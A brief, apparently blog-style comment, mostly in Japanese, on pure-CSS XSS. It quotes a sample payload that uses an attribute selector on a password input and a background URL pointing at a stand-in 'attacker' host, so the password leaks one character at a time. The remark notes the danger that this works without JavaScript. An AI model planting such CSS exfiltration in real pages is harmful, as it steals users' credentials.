pure css-based XSS attacks ?
<style>input[name=password][value*=a]{
background:url('//attacker?log[]=a');
}</style>
<iframe seamless src=”login.asp”/>
このようなベクタがもしも近い将来において実現するならば極めて剣呑です。ま、XSSが成立するならformの中のinput要素の中身が漏洩するのは当然として、JavaScript無しでも炸裂してしまうあたりが嫌なところなのですよね。
